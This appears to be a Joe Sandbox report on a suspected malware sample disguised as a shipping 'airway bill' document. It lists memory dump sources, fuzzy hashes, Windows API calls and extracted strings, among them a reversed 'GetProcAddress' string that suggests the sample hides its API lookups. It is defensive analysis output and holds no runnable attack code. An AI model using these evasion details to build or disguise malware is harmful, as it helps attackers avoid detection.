                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                    • Instruction ID: 62a810153de6e0ef121c48807820436cf0107c596635a4854f344034414b8934
                                                                                                    • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                    • Instruction Fuzzy Hash: 19D05EB630E3702AA220915A2D84DBBAAFCCBC57A1F0044BEF58CC6250D2008C0996F5
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LocalTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 481472006-0
                                                                                                    • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                    • Instruction ID: 2172b8c1bf90d8fd47c673e84136d5d5999d84b6ffb7ec30655d161e2957ab61
                                                                                                    • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                    • Instruction Fuzzy Hash: 8EA0121040483001854037180C0217531445900620FC40FC068FC503D0ED1D012440D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 08891fea0e65882e64dd3236ca6edf1095d128b8e110253f6cee811b4537ca77
                                                                                                    • Instruction ID: 41ba9a5f7c21212b028a1ca97f7bff3bf93b4bdd294e69b9c9e16ce518888278
                                                                                                    • Opcode Fuzzy Hash: 08891fea0e65882e64dd3236ca6edf1095d128b8e110253f6cee811b4537ca77
                                                                                                    • Instruction Fuzzy Hash: DF517FA64193C24FC7635F3494E62C23FA1ED6352874E11DAC8E08F2B7E619494BDF62
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
• Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
• Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
• Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B2D21D
  • Part of subcall function 02B2D1E8: GetProcAddress.KERNEL32(00000000), ref: 02B2D201
Strings
Memory Dump Source
• Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
• Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
• API String ID: 1646373207-1918263038
• Opcode ID: e1081c6884ab5b775a44db948e857c2ec21c8e78325d63cc3f794430c1ba0e3b
• Instruction ID: bde7d9d7a449cb8dee3ee202645d36836a840eebd6ee8025c2ac599a92860fb8
• Opcode Fuzzy Hash: e1081c6884ab5b775a44db948e857c2ec21c8e78325d63cc3f794430c1ba0e3b
• Instruction Fuzzy Hash: B7416D62A9533A4B12086F6D780042B7F9ED7883913A144DFF05CCBB44DD20B99F8E6A
APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B36E5E
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B36E6F
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B36E7F
• GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B36E8F
• GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B36E9F
• GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B36EAF
• GetProcAddress.KERNEL32(00000002), ref: 02B36EBF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
• Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
• API String ID: 667068680-2233174745
• Opcode ID: 7c1ac579edc1bab7adcac2cf1e6fcf44590bbdadbe6e82608f0c32e2d7631765
• Instruction ID: 5bc7630051104b472d665a981389d4396ac15851a889144abf612cbc984658ac
• Opcode Fuzzy Hash: 7c1ac579edc1bab7adcac2cf1e6fcf44590bbdadbe6e82608f0c32e2d7631765
• Instruction Fuzzy Hash: ADF0ACB8A883727EB3137F709CC18673BDDE701A4470019E6B61696A12DAB5841C4F64
APIs
• MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B228CE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
• Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
Similarity
• API ID: Message
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
• API String ID: 2030045667-32948583
• Opcode ID: 30f2382ea7ac69a246c6190321eefd1c97b25157a34f9ba4d3c5bfee8643d1eb
• Instruction ID: ef074bb8b2e0ef6134537f12044adc3609150cac9be9238bd9d79d37fc45beac
• Opcode Fuzzy Hash: 30f2382ea7ac69a246c6190321eefd1c97b25157a34f9ba4d3c5bfee8643d1eb
• Instruction Fuzzy Hash: 6AA1B131A043788BDB21AA2CCC84B99B6E5EB09350F1441E5ED4DEB386CB7599CECF51
Strings
• bytes: , xrefs: 02B2275D
• , xrefs: 02B22814
• The unexpected small block leaks are:, xrefs: 02B22707
• Unexpected Memory Leak, xrefs: 02B228C0
• The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B22849
• An unexpected memory leak has occurred. , xrefs: 02B22690
• 7, xrefs: 02B226A1
Memory Dump Source
• Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
• Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
Similarity
• API ID:
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
• API String ID: 0-2723507874
• Opcode ID: f2983cb85add3d6b13230e4230c5e30f00bd3d797609e6ccf031857a607d5b37
• Instruction ID: 52f48dc29ee7f02ac22b639924af9f6a8f66314d1e7bdd7a70e2c2592ca10a98
• Opcode Fuzzy Hash: f2983cb85add3d6b13230e4230c5e30f00bd3d797609e6ccf031857a607d5b37
• Instruction Fuzzy Hash: 5D719230A043788FDB21AA2CCC84BD9BAE5EB09754F1041E5D94DEB281DB759AC9CF51
APIs
• GetThreadLocale.KERNEL32(00000000,02B2C00B,?,?,00000000,00000000), ref: 02B2BD76
  • Part of subcall function 02B2A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762
Strings
Memory Dump Source
• Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
• Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
Similarity
• API ID: Locale$InfoThread
• String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
• API String ID: 4232894706-2493093252
• Opcode ID: 63b6a37788cc9953f5343d8d0add01b9b7d3f43e7c8698fa8b4503afc28eed14
• Instruction ID: 6ebdd7fb2dacc12e4a4cf657a1ad8978dc86fd9d9784f31c344c3869f2a3611a
• Opcode Fuzzy Hash: 63b6a37788cc9953f5343d8d0add01b9b7d3f43e7c8698fa8b4503afc28eed14
• Instruction Fuzzy Hash: CF616E35B003689BDB00FBA4DC90BDF77BBDF48340F1198B5A1099B605CA38D94E9BA5
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AE38
• GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B3AE4F
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AEE3
• IsBadReadPtr.KERNEL32(?,00000002), ref: 02B3AEEF
• IsBadReadPtr.KERNEL32(?,00000014), ref: 02B3AF03
Strings
Memory Dump Source
• Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
• Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
Similarity
• API ID: Read$HandleModule
• String ID: KernelBase$LoadLibraryExA
• API String ID: 2226866862-113032527
• Opcode ID: 6f5de11134bf9064cb31d8ce290aba7405be1d99a2657e10d1dbf065e73ec4a3
• Instruction ID: b85f60ed237f951c2e89ea557c60191714f1af377d90485f7c3a2b13f6eb55c9
• Opcode Fuzzy Hash: 6f5de11134bf9064cb31d8ce290aba7405be1d99a2657e10d1dbf065e73ec4a3
• Instruction Fuzzy Hash: 563122B1640315BBDB12DF68CC85F9A77A8EF04754F204590FA98DB281D774A950CBA1
APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8,?,?,02B4D7A8,02B2655D,02B4C30D), ref: 02B24365
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8,?,?,02B4D7A8,02B2655D,02B4C30D), ref: 02B2436B
• GetStdHandle.KERNEL32(000000F5,02B243B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8), ref: 02B24380
• WriteFile.KERNEL32(00000000,000000F5,02B243B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?), ref: 02B24386
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B243A4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
• Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
Similarity
• API ID: FileHandleWrite$Message
• String ID: Error$Runtime error at 00000000
• API String ID: 1570097196-2970929446
• Opcode ID: 0deee3a5155c4083fa1bbfa134a053316d06f40084b134b2908d8d2749303e7e
• Instruction ID: 307a2fde8b0f9d07f7b8676dad534f2884633019e781f05f1b82ac8d85953777
• Opcode Fuzzy Hash: 0deee3a5155c4083fa1bbfa134a053316d06f40084b134b2908d8d2749303e7e
• Instruction Fuzzy Hash: 7BF02B71AD033074F710A7646D46F59276C4B05F55F104AD4F23C994D18BB490CCDB26
APIs
  • Part of subcall function 02B2ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACD9
  • Part of subcall function 02B2ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2ACFD
  • Part of subcall function 02B2ACBC: GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD18
  • Part of subcall function 02B2ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADAE
• CharToOemA.USER32(?,?), ref: 02B2AE7B
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B2AE98
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AE9E
• GetStdHandle.KERNEL32(000000F4,02B2AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AEB3
• WriteFile.KERNEL32(00000000,000000F4,02B2AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AEB9
• LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B2AEDB
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B2AEF1
Memory Dump Source
• Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
• Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
Similarity
• API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
• String ID:
• API String ID: 185507032-0
• Opcode ID: 491f808e2b7a675c36f1f545d5a9c6246c2cbdb305617e945d2fb2f1840e0b96
• Instruction ID: 11047321ceed2af91b8804a99d83c7b5814b2d479ac08b8385ac415a4eef22a1
• Opcode Fuzzy Hash: 491f808e2b7a675c36f1f545d5a9c6246c2cbdb305617e945d2fb2f1840e0b96
• Instruction Fuzzy Hash: 1A1130B25483507ED601FBA4DC81F9B77EDAB44740F40099AB758D71E0DA70E94C8F66
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E5A5
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E5C1
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B2E5FA
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E677
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B2E690
                                                                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 02B2E6C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 351091851-0
                                                                                                    • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                    • Instruction ID: aa8a0f72767948a6574ddabd34ab5f3960e8fe41a1014243c0a974b32238fde2
                                                                                                    • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                    • Instruction Fuzzy Hash: 7F51C6759007299BCB22DB59CC80BD9B3BDAF4D304F0442D5E60DA7206DA30EF898F65
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B2358A
                                                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235BD
                                                                                                    • RegCloseKey.ADVAPI32(?,02B235E0,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                    • Opcode ID: b5e316522baf2860815bfe892ef7778b04a6ec91f882216649677726fa1e674a
                                                                                                    • Instruction ID: f060609930730e8b638e9741eb05c7260813a215267a686851b9cb279585f51c
                                                                                                    • Opcode Fuzzy Hash: b5e316522baf2860815bfe892ef7778b04a6ec91f882216649677726fa1e674a
                                                                                                    • Instruction Fuzzy Hash: 7201D879954328BAF711DB90CD42BBD77FCEB08710F1005E1BA0CD7680E678AA14DB59
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                    • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: Kernel32$sserddAcorPteG
                                                                                                    • API String ID: 667068680-1372893251
                                                                                                    • Opcode ID: 6d1bec3b9f3e7e35ed84b7aa921e8b14818c4212109a58f2ec86b04f4cbf6aec
                                                                                                    • Instruction ID: 8acf2a93a133c37591560a337c867ce83f8fc216adcddbc4a490d41ec46cd9eb
                                                                                                    • Opcode Fuzzy Hash: 6d1bec3b9f3e7e35ed84b7aa921e8b14818c4212109a58f2ec86b04f4cbf6aec
                                                                                                    • Instruction Fuzzy Hash: 5E014F75A50308BFEB02EFA4DC41A9E77BEEB4D710F5184A4F508A7A10DA70A915CA21
                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,02B2AA67,?,?,00000000), ref: 02B2A9E8
                                                                                                      • Part of subcall function 02B2A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762
                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B2AA67,?,?,00000000), ref: 02B2AA18
                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 02B2AA23
                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B2AA67,?,?,00000000), ref: 02B2AA41
                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 02B2AA4C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                    • String ID:
                                                                                                    • API String ID: 4102113445-0
                                                                                                    • Opcode ID: a202f69da43f37349ba956e40217c894746d713e8073df507476f02ab382b793
                                                                                                    • Instruction ID: a5f4c26f98753ecec4e842a52e2aa809cce7e888cf180a585b60fe8a573c8895
                                                                                                    • Opcode Fuzzy Hash: a202f69da43f37349ba956e40217c894746d713e8073df507476f02ab382b793
